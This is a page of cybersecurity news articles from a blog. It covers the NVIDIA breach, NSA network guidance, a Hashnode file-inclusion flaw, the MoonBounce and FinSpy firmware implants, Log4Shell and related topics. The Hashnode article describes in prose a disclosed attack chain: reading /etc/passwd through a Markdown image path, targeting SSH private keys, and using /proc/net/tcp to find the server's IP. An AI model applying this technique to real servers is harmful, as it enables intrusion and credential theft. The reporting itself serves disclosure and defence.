Monday, January 20, 2025
Home Blog Page 42

NVIDIA DataBreach: Credentials of 71,000 Employees Leaked

By
Steven Black (n0tst3)
-
0
databreach

The email addresses and passwords of more than 71,000 NVIDIA employees were likely stolen in a recent cyberattack and are now circulating within underground communities

Nvidia Databreach

On February 23, hackers managed to compromise NVIDIA’s network and steal not only employee credentials but also proprietary information.

The Lapsus$ ransomware gang, which claimed responsibility for the attack and apparently asked the chip maker to pay $1 million for the stolen data, started leaking the compromised information over the weekend, saying the move was retaliation to NVIDIA’s alleged attempt to hack them back.

Earlier this week, the company confirmed that sensitive data was stolen in the incident, but provided no details on the number of impacted individuals or the manner in which its network was breached.

According to data breach monitoring website Have I Been Pwned, however, the hackers managed to exfiltrate the credentials of roughly 71,300 NVIDIA employees.

The attackers stole email addresses and NTLM password hashes, and were subsequently able to crack many of these, after which they made them available to other hacking community members.

As part of the incident, the hackers also appear to have stolen two expired code signing certificates.

According to Rochester Institute of Technology researcher Bill Demirkapi, “Windows still allows them to be used for driver signing purposes.”

Nvidia DataBreach: Response

nvidia databreach

The giant said: “We do not anticipate any disruption to our business or our ability to serve our customers as a result of this incident.” The hacking group said that the giant was able to encrypt one of the computers of the hacking group when they were extracting data.

Nvidia doesn’t believe that the attack has any relation to the recent political conflicts between Russia and Ukraine. The hacker group has also denied any political affiliation. “We have no evidence of ransomware being deployed in the Nvidia environment or that this is related to the Russia-Ukraine conflict.”

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

NSA Publishes Top Practices for Improving Network Defenses

By
Steven Black (n0tst3)
-
0
Cybersecurity

The National Security Agency (NSA) this week published a set of best practices for organizations looking to improve the overall security of their networks

The guidance is meant to be generic, applicable to a broad range of network devices, and should help administrators prevent adversaries from exploiting their networks.

According to the NSA, organizations looking to ensure that a network is protected from threats and that resources are secured should implement multiple defensive layers and also adopt a zero-trust security model.

When it comes to network architecture, the NSA recommends that organizations install security devices such as a border router and next-generation firewalls at the perimeter, and also notes that publicly accessible systems and outbound proxies should be placed in between firewalls, and that monitoring solutions, remote log servers, and redundant devices should be deployed within the network.

Practices for Improving Network Defenses

Furthermore, the NSA notes in its Network Infrastructure Security Guidance that admins should group together similar systems within the network and isolate them into subnets, applying proper network segmentation to ensure that an adversary able to compromise the most exploitable devices in the environment cannot reach other systems as well.

“Operational technology, such as industrial control systems, typically need to be isolated from other information technology and high-risk networks like the Internet. This physical separation provides stronger protection because the intermediate device between subnets must be compromised for an adversary to bypass access restrictions,” the NSA says.

Network security best practices, the NSA says, also include implementing access restrictions to critical internal network devices and a network access control (NAC) solution, removing backdoor connections, and limiting and encrypting virtual private networks (VPNs).

In addition to a secure network architecture, administrators should also properly configure authentication, authorization and accounting (AAA) and apply the principle of least privilege, they should ensure that administrative accounts are properly secured with unique usernames and passwords, should securely store credentials, and should disable unused accounts.

Network security best practices, the NSA says, also include proper file system and boot management, maintaining all software and operating systems updated, and ensuring that in-use hardware is still supported by vendors.

Remote logging and monitoring along with secure remote management of network devices should also be implemented. Moreover, administrators are advised to disable IP source routing, disable unused ports and port monitoring, and disable unnecessary network services.

“Along with essential maintenance functions, administrators play a critical role in defending networks against adversarial threats. Following this guidance will assist these network defenders with putting cybersecurity best practices into action, lowering the risk against compromise and ensuring a more secure and better protected network,” the NSA concludes.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has encouraged network architects, defenders, and administrators to review the NSA’s guidance to harden their networks.

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Remote code execution vulnerability in Hashnode blogging platform

By
Steven Black (n0tst3)
-
0
vulnerability

A remote code execution (RCE) attack chain caused by a local file inclusion bug in blogging platform Hashnode has been disclosed by security researchers.

On February 28, Aditya Dixit, a penetration tester and security engineer based in India, said in a security advisory that the RCE had been found in Hashnode, a blogging platform for the engineering and developer community.

Dixit experienced continual errors while attempting to import posts on Hashnode. After examining the issue in Burp Suite, he found coding errors and a local file inclusion (LFI) vulnerability that allowed users to fetch internal server files.

This issue was present in Hashnode’s Bulk Markdown Importer, a feature developed for users to import .ZIP compressed files in Markdown (.md) format.

Together with security researcher Adhyayan Panwar, Dixit was able to escalate the LFI to achieve RCE.

The duo found an Error NO ENTry (ENOENT) error in Markdown – via Burp Suite – when a user tried to insert an image with a specified path.

“From here, it was just a matter of connecting the dots to fetch the internal files from the server,” Dixit said.

“Instead of a non-existent path, we decided to give the location of an actual file like the /etc/passwd hoping it would give us the file contents in the response.”

Hiding in plain sight

Dixit and Panwar were able to directly download files, and now armed with user and home directory path names from the passwd file, the team decided to “try” for RCE.

To turn this attack into remote code execution, the IP address of the server was required. Dixit said that by default, public and private keys are stored in two separate, default directories, and it was possible to modify a payload to fetch the private key.

The server was being “hidden behind Cloudlfare,” the pen tester says, and so Panwar turned to the /proc/net/tcp directory to find the right IP address. The /proc interface revealed active TCP connections, and while addresses are stored as hex values, it was possible to use simple code to convert them into a readable format – exposing the IP address and port number.

Panwar told The Daily Swig that /proc/net/tcp can provide crucial information regarding internal ports, giving investigators a “broader attack surface”. However, an infosec Discord user suggested checking the file for the information required to create an RCE trigger.

“We had never looked at it from a perspective of retrieving IP addresses,” the researcher said. “It contained a list of all the connections that were active on the server, with a list of local and remote addresses. We could identify three local addresses: one was localhost, one was their intranet IP and one was [a] public IP, which allowed SSH connections.”

If an attacker is armed with this information, they could then execute code on the server.

Key rotation

The Hashnode team was informed of the researchers’ findings on February 8. Hashnode told us that “the vulnerability was associated with one of our legacy components and was fixed pretty much immediately. We also rotated all of our keys immediately.”

Dixit commented: “Even though we were able to get the private key for the user, we could not SSH into the server because according to Hashnode, there was IP address whitelisting to prevent unauthorized access”.

“We did not actually try to log in when we got the key because of obvious reasons. But in cases where the admins have not implemented any IP whitelisting [allow listing] or firewalls, this can definitely lead to a full server compromise.”

“The takeaway from our exploit would be to never display descriptive messages to the end-users and always have input validation in place on all the input parameters,” the researcher added. “It’s a really bad idea to trust your users’ inputs.”

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

MoonBounce Malware Hides In Your BIOS Chip, Persists After Drive Formats

By
Steven Black (n0tst3)
-
0

A new type of malware takes a decidedly more stealthy and hard-to-remove path into your OS — it hides in your BIOS chip and thus remains even after you reinstall your OS or format your hard drive.

Kaspersky has observed the growth of Unified Extensible Firmware Interface (UEFI) firmware malware threats since 2019, with most storing malware on the EFI System Partition of the PC’s storage device. However, a sinister development had earlier been spotted with a new UEFI malware, detected by Kasperksy’s firmware scanner logs, that implants malicious code into the motherboard’s Serial Peripheral Interface (SPI) Flash. The security researchers have dubbed this flash-resident UEFI malware ‘MoonBounce’.

Dangerous MoonBounce Malware

MoonBounce isn’t the first UEFI malware discovered in the wild that targets SPI flash. Kaspersky says that the likes of LoJax and MosaicRegressor came before it. However, MoonBounce shows “significant advancement, with a more complicated attack flow and greater technical sophistication.” It also seems to have infected a machine remotely.

MoonBounce is undeniably clever in the way it gets into a system and makes itself hard to detect and dispose of. “The source of the infection starts with a set of hooks that intercept the execution of several functions in the EFI Boot Services Table,” explains Kaspersky on its SecureList blog. The hooks are then used to divert function calls to the malicious shellcode that the attackers have appended to the CORE_DXE image. This, in turn, “sets up additional hooks in subsequent components of the boot chain, namely the Windows loader,” said the security researchers. This allows the malware to be injected into an svchost.exe process when the computer boots into Windows.

Magic marker values replaced during execution within shellcodes in MoonBounce. (Image credit: Kaspersky Labs)

Transport Technology Company the Only Logged Attack so Far

Of course, Kaspersky was interested to see what the malware would do next. So, on an infected machine, the researchers observed the malware process try and access a URL to fetch the next stage payload and run it in memory. Interestingly, this part of the sophisticated attack didn’t seem to go anywhere, so it wasn’t possible to analyze any further steps in MoonBounce. Perhaps this malware was still in testing when it was spotted, and/or it is being held back for special purposes. In addition, the malware isn’t file-based and does at least some of its operations only in memory, making it hard to see exactly what MoonBounce did on the single host PC on a company’s network.

A single machine, owned by a transportation company, seems to be the only machine on Kaspersky’s logs that has a MoonBounce infection in its SPI Flash. It isn’t certain how the infection took place, but it is thought it was instigated remotely. That sole machine at a transport technology company seems to have spread non-UEFI malware implants to other machines on the network. With much of its work being file-less and memory resident only, it isn’t easy to observe from this single sample.

Below, a flow chart breaks down how MoonBounce boots and deploys from the moment your UEFI PC is switched on, through Windows loading, and into being a usable but infected PC.

(Image credit: Kaspersky Labs)

APT41 Fingerprints Detected

Another important branch of the work done by security researchers like Kaspersky is looking into who is behind the malware that it discovers, what the purposes of the malware are, and what specific targets the malware is primed for.

Concerning MoonBounce, Kaspersky seems pretty certain that this malware is the product of APT41, “a threat actor that’s been widely reported to be Chinese-speaking.” In this case, the smoking gun is a “unique certificate” that the FBI has previously reported as signaling the use of APT41-owned infrastructure. APT41 has a history of supply chain attacks, so this is a continuation of a central thread of APT41’s nefarious operations.

Safety Measures

To help avoid falling victim to MoonBounce or similar UEFI malware, Kaspersky suggests a number of measures. It recommends users keep their UEFI firmware updated directly from the manufacturer, verify that BootGuard is enabled where available, and enable Trust Platform Modules. Last but not least, it recommends a security solution that scans system firmware for issues so measures can be taken when UEFI malware is detected.

Go to original article

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

U.S. Gov Issues Stark Warning, Calling Firmware Security a ‘Single Point of Failure’

By
Steven Black (n0tst3)
-
0

U.S. government warns that firmware presents “a large and ever-expanding attack surface.”

The U.S. government, at the very highest levels, is calling attention to major weaknesses in the firmware supply chain, warning that the layer below the operating system is fertile ground for devastating hacker attacks.

A new joint draft report issued by leadership of the U.S. Department of Homeland Security (DHS) and Department of Commerce said firmware presented “a large and ever-expanding attack surface” for malicious hackers to subvert the core of modern computing.

“Securing the firmware layer is often overlooked, but it is a single point of failure in devices and is one of the stealthiest methods in which an attacker can compromise devices at scale.”

“Attackers can subvert OS and hypervisor visibility and bypass most security systems, hide, and persist in networks and devices for extended periods of time while conducting attack operations, and inflict irrevocable damage,” the two agencies said following a one-year assessment of the supply chains for critical IT infrastructure deployed in the United States.

“Firmware can also be a lucrative target with a relatively low cost of attack. Over the past few years, hackers have increasingly targeted firmware to launch devastating attacks.”

The whopping, 96-page report (PDF), published to support the Biden Executive Order on securing America’s supply chains, warned that firmware’s privileged position in the computing stack gives stealthy attackers a major advantage.

Despite its essential role in electronic devices, the agencies insisted that firmware security “has not traditionally been a high priority for manufacturers or users and is not always well protected.” 

During the assessment, the agencies found that firmware on items such as network cards, Wi-Fi adapters, and USB hubs are often not properly signed with public or private keys. 

“These devices have no way to verify that the operating firmware is authentic and can be trusted.”

Even worse, the agencies called special attention to the fact that OEMs and computer makers outsource firmware development to third party suppliers.  “[This] introduces risks related to the lack of transparency into suppliers’ programming and cybersecurity standards.”

The government’s warning comes as threat hunters spot signs that nation-state APT actors are using UEFI firmware implants to maintain stealthy infections and survive reboots and OS reinstallations.  The notorious FinSpy surveillance spyware toolkit was also fitted with a bootkit to conduct stealthy infections.

In the report, the agencies also warned of “complex supply chains” that compound the problems securing firmware deployments.

“In PC production, for example, the OEMs are typically responsible for firmware and the rest of the PC platform elements. However, many OEMs outsource firmware development to third-party suppliers where OEMs may not have visibility into their cybersecurity hygiene. Even if OEMs establish security standards, they may not be able to enforce supplier security protocols across a wide range of components and sub-suppliers,” the government agencies warned.

The report also noted that individual OEM vendors may modify the firmware based on device needs once the firmware has been delivered to the OEM. “This can lead to confusion about what party is ultimately responsible for firmware integrity and who is to supply customer updates.” 

“In addition, as devices and firmware change, OEMs often contract with different firmware developers, which can lead to delays or a lack of any update when older devices require updating and the original developer is not available. All of these factors can leave firmware open to malicious attacks,” the report said.

The agencies also called attention to the pain-point of applying firmware updates. “A firmware’s update process and capability vary by device. Some devices receive regular firmware updates. Some may only receive one update over their lifetimes, while others may never receive an update.”

Even worse, the process to install firmware updates is not simple, leading to skipped patches for critical-level vulnerabilities. 

“Firmware updates present a major logistical challenge for many enterprises,” the agences said. “In many instances, device firmware is never updated or may only be updated in an emergency. In addition, vendors may only supply firmware updates if driven by an incident or identified vulnerability.”

FinSpy Surveillance Spyware Fitted With UEFI Bootkit
Prolific Chinese APT Caught Using MoonBounce UEFI Firmware Implant

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Prolific Chinese APT Caught Using MoonBounce UEFI Firmware Implant

By
Steven Black (n0tst3)
-
0

Threat hunters at Kaspersky have spotted a well-known Chinese APT actor using an UEFI implant to maintain stealthy persistence across reboots, disk formatting or disk replacements.

The discovery is another confirmation that apex threat actors are already deploying hard-to-detect malware below the operating system and the connection to a Chinese APT actor is an ominous sign firmware implantation may already be widespread.

A detailed technical analysis (download PDF) from Kaspersky’s global research team documents the  ‘MoonBounce’ UEFI firmware implant and its connection to APT41 (also known as Winnti), a prolific threat actor that is known to carry out Chinese state-sponsored espionage activity.

Kaspersky researchers said the below-the-OS compromise was originally flagged by firmware scanning technology built into its products to spot signs of rootkit infections. Upon inspection, researchers discovered that a single component within the firmware image was modified by attackers in a way that allowed them to intercept the original execution flow of the machine’s boot sequence and introduce a sophisticated infection chain.

The initial UEFI infection vector not yet known but Kaspersky discovered that the attacker added malicious shellcode and a kernel-mode driver into a newly created section within the compromised firmware image to commandeer the infected machine’s boot routine.

“Due to its emplacement on SPI flash which is located on the motherboard instead of the hard disk, the implant is capable of persisting in the system across disk formatting or replacement,” Kaspersky said in the report.

The researchers say the purpose of the implant is to manage the deployment of user-mode malware that stages execution of further payloads downloaded from the internet.

“The infection chain itself does not leave any traces on the hard drive, as its components operate in memory only, thus facilitating a fileless attack with a small footprint,” Kaspersky noted, warning that other non-UEFI implants were discovered in the targeted network communicating with the same infrastructure that hosted the staging payload.

Kaspersky said its global detection data shows the attack was extremely targeted and was seen in one solitary case and said the targeting corresponds to an organization in control of several enterprises dealing with transport technology.

The MoonBounce discovery is the third publicly documented case of firmware-based rootkit implantation. Just last year, researchers found signs the FinSpy surveillance spyware tool was fitted with a UEFI bootkit and ESET found similar capabilities in a cyberespionage campaign.

“MoonBounce marks a particular evolution in this group of threats by presenting a more complicated attack flow in comparison to its predecessors and a higher level of technical competence by its authors, who demonstrate a thorough understanding of the finer details involved in the UEFI boot process,” Kaspersky said.

As a safety measure against this attack and similar ones, Kaspersky recommends that users update UEFI firmware regularly and verify that BootGuard, where applicable, is enabled. 

The company also suggests enabling Trust Platform Modules and deployment of a security product that offers visibility into firmware images.

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

FinSpy Surveillance Spyware Fitted With UEFI Bootkit

By
Steven Black (n0tst3)
-
0

Security researchers at Kaspersky have spotted signs of the notorious FinSpy surveillance spyware hijacking — and replacing — the Windows UEFI bootloader to perform stealthy infections on target machines.

This method of infection allowed the attackers to install a bootkit without the need to bypass firmware security checks and serves as confirmation that the controversial vendor of “lawful interception” spyware has modernized operations to remain undetected.

“UEFI infections are very rare and generally hard to execute, they stand out due to their evasiveness and persistence,” according to Kaspersky’s Igor Kuznetsov and Georgy Kucherin. “While in this case the attackers did not infect the UEFI firmware itself, but its next boot stage, the attack was particularly stealthy as the malicious module was installed on a separate partition and could control the boot process of the infected machine.”

In a research paper documenting what it calls “unseen findings” related to FinSpy, Kaspersky said the spyware has been tweaked since 2018 to add multiple checks to avoid the prying eyes of security researchers.

“[This is] one of the hardest-to-detect spywares to date,” the researchers said, noting that the spyware has now been fitted with four different levels of obfuscation in addition to the UEFI bootkit vector.

Unlike previous FinSpy versions that contained the Trojan in the infected application immediately, Kaspersky found the new samples are now protected by two components: a non-persistent pre-validator and a post-validator. 

“The first component runs multiple security checks to ensure that the device it is infecting does not belong to a security researcher. Only when the checks pass, is the post-validator component provided by the server – this component ensures that the infected victim is the intended one. Only then would the server command deployment of the full-fledged Trojan platform,” Kaspersky said.

The spyware features four complex custom-made obfuscators meant to slow down the analysis of the spyware. On top of that, the Trojan is capable of using the developers’ mode in browsers to intercept traffic protected with the HTTPS protocol.

“The amount of work put into making FinFisher not accessible to security researchers is particularly worrying and somewhat impressive,” Kuznetsov said. “It seems like the developers put at least as much work into obfuscation and anti-analysis measures as in the Trojan itself. As a result, its capabilities to evade any detection and analysis make this spyware particularly hard to track and detect,” he added.

Kuznetsov said the UEFI infection scenario was clever and straightforward. “All machines infected with the UEFI bootkit had the Windows Boot Manager (bootmgfw.efi) replaced with a malicious one. When the UEFI transfers execution to the malicious loader, it first locates and replaces the original Windows Boot Manager with a patched version capable of bypassing all security checks.”

On older machines that do not support UEFI, Kaspersky observed infections through the MBR (Master Boot Record).  

The Kaspersky research comes at a sensitive time for commercial spyware vendors who exploit zero-days in major software products to infect every type of computing device, from iPhones to Android devices to Windows, macOS and Linux machines.

While these companies claim the surveillance tools are only sold to licensed governments and law enforcement agencies, researchers have published evidence of abuse with targets including government critics, dissidents, journalists and social workers.

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Log4Shell flaw: Still being used for crypto mining, botnet building… and Rickrolls

By
Steven Black (n0tst3)
-
0

Log4Shell is still a threat, however the flaw is currently mostly being used for crypto mining and knocking out websites

Nearly three months on, at the time of writing, Log4Shell, the critical bug in Apache’s widely used Log4j project, hasn’t triggered the disaster that was feared, but it’s still being exploited and predominantly from cloud computers in the US. 

The Log4Shell vulnerability came to light in December and sparked concern that it would be exploited by attackers because it was relatively easy to do and because the Java application logging library is embedded in many different services.

Microsoft has observed Log4Shell being used by state-sponsored and criminal attacks but early on found it was mostly being used for coin mining and ransomware. It advised customers to “assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments.”

The Cybersecurity and Infrastructure Security Agency warned that, while it hadn’t seen any major breach happen due to the flow, attackers might be waiting to use access gained through Log4Shell until alert levels fall. Oracle, Cisco, IBM and VMware have spent the past two months releasing patches for affected software. 

Barracuda Networks, a maker of network security appliances, has now said that Log4Shell attacks are happening at consistent levels. However, it hasn’t found evidence of an onslaught of attacks. 

“The majority of attacks came from IP addresses in the U.S., with half of those IP addresses being associated with AWS, Azure and other data centers. Attacks were also being sent from Japan, Germany, Netherlands, and Russia,” it notes

It adds that these IP addresses are linked to scans and attempted intrusions, which mean the scans could be from researchers or attackers. 

The payloads range from trivial internet memes to the somewhat more serious category of crypto-mining malware that uses another person’s hardware to solve equations that earn the attacker crypto such as Monero. 

One, for example, attempts to delivery a “relatively benign (or depending on your viewpoint, very annoying) payload” in the form of a a YouTube video that plays Rick Astley’s “Never Gonna Give You Up.” 

“I do wonder if anyone was actually Rick-Rolled by this one. It is, as noted earlier, a benign payload in my opinion, but one that will get you patching very quickly!” says Baracuda’s Tushar Richabadas.

Other notable malware it reports being used in connection with Log4Shell include the distributed denial of service (DDoS) malware called BillGates. It’s an old piece of malware that has no connection with Microsoft’s co-founder and that targets Linux machines. Log4Shell has also been used to deploy Mirai DDoS malware, which is often used in conflicts between online gamers.  

Barracuda has seen also seen Log4Shell being used to deploy cypto miners Kinsing and XMRig, as well as the Muhstik DDoS malware

Overall, Barracuda’s report suggests there is no change in the threat level from Log4Shell than was the case in January. 

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Cisco’s 7 Guiding Principles of Government Data Demands

By
Steven Black (n0tst3)
-
0

At Cisco, we empower our customers to control their data. Protecting the privacy, integrity, and confidentiality of data in our possession is of utmost importance. In a world of advancing cyberthreats, expanding extraterritorial legislation, and growing concerns for data localization, we understand technology companies have an outsized responsibility to ensure customers have the power to make important decisions about their data.

Like all global technology companies, there are scenarios when Cisco receives demands from law enforcement, intelligence agencies, or governments requesting access to data related to an ongoing investigation. When this happens, Cisco follows a strict set of procedures to ensure that data disclosures are minimized, controlled, and that access to our solutions and services remains free from unlawful intrusion.

Our Principled Approach drives our policies and procedures in how we operate as a company when receiving government demands for data: 

Principle 1: We believe governments, including law enforcement and national security agencies, should go directly to our customers to gain access to data regarding those entities, their employees, and users. We will refer government to the relevant customer before disclosing any data in Cisco’s possession. We will only consider disclosing data directly to the government in scenarios where the customer does not have the relevant corresponding data, if the customer has requested that we disclose the data to the government, or if the government has confirmed that it cannot seek the requested information from the customer.

Principle 2: Cisco will provide data in response to a demand only if the requesting government has demonstrated appropriate lawful authority to require us to provide the data. Where demands are not accompanied by valid legal process, Cisco will challenge or reject the request. 

Principle 3: Cisco will carefully review every government demand to ensure legal validity, and we will narrowly interpret demands to produce the least data necessary to comply. Cisco will challenge any government demand that raises human rights concerns. Cisco’s actions will be guided by our Global Human Rights Policy.

Principle 4: Unless prohibited by applicable law, Cisco will notify the customer that its data has been requested prior to producing any data to government, so that the customer may attempt to limit or prevent disclosure.

Principle 5: Cisco will only make an exception to our customer notification commitments in emergency circumstances where disclosure to the government will prevent imminent death or serious physical harm to an individual. Where not prohibited by applicable law, we will subsequently notify the customer if such an exception has been made. Emergency demands will be included in our semiannual Transparency Report.

Principle 6: Where demands that prohibit notification to the customer are excessive in duration (over one year in length), or are overly broad in scope, Cisco will challenge the demand to protect our customer’s interests.

Principle 7: Where compliance with a valid government demand would put Cisco in potential breach of applicable data protection and/or privacy-related laws in another country that has jurisdiction over the data, we will challenge the demand and invoke mutual legal assistance mechanisms, where appropriate.

We are committed to constantly reassessing these principles to ensure they align with growing international privacy regulations and continuously exceed our customers’ expectations.

Beyond our principles, Cisco actively engages in advocacy work in topics of government surveillance reform and digital sovereignty to help encourage regulations that are consistent with Cisco’s principled approach. We are members of BSA The Software Alliance, Information Technology Industry Council (ITI), and the US ASEAN Business Council to address these issues across the globe.

Article sourced from Cisico Blog

Go to Cybersecurity Knowledge Base

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Report: 93% of orgs are challenged by malware analysis

By
Steven Black (n0tst3)
-
0

A new report by OPSWAT found that, despite malware analysis becoming a mature business function, a glaring 93% of organizations are challenged by malware analysis.

Among the top malware analysis challenges are lack of automation (58%), lack of integration (56%), and lack of team experience in using tools (45%). These ultimately result in poor data outcomes and an inefficient process that can create a bottleneck — and when responding to an attack, time is of the essence.

Most alarming is that, because of these combined challenges, only 3% of organizations are able to fully investigate and resolve malicious files through malware analysis, and one in five (22%) resolve less than half of their malicious files. 

As organizations grapple with Advanced Persistent Threats (APTs), targeted attacks, and highly motivated ransomware groups, malware analysis has become a critical business process in order to proactively consume threat intelligence to better understand their adversaries and hunt for threats to stay ahead of attackers.

The report identifies the attitudes, statistics, trends and best practices to address file-based threats and to help organizations understand the greatest challenges facing malware analysis today so they can make better informed decisions and improve their own programs. 

Malware analysis is a time-consuming manual process, made all the more complex by tools that are not integrated. Such monotonous workflows can become the source of employee burnout, or introduce human error into the process, making the demand for high-performance and accurate solutions a premium.

The technical limitations of malware analysis and the struggle to find experienced malware analysts are two sides of the same coin, and if malware analysis is to continue maturing as a business function, then organizations need to be aware of their current limitations and begin investing in more automated, integrated, and accurate solutions — resulting in a stronger security posture and higher performing staff.

The report surveyed 309 qualified participants in 17+ industries within critical infrastructure sectors.

Read the full report by OPSWAT.

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose
1...414243...79Page 42 of 79

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.